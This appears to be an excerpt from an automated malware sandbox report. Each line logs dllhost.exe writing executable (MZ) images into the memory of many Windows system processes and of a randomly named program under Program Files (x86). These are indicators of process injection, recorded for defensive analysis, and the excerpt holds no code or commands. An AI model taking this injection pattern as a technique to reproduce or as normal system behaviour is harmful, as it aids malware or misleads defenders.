Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 7DB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF36C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 173E6B70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 166801F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\cscript.exe base: 3020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EB71E60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 227B9BA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000 value starts with: 4D5A Jump to behavior
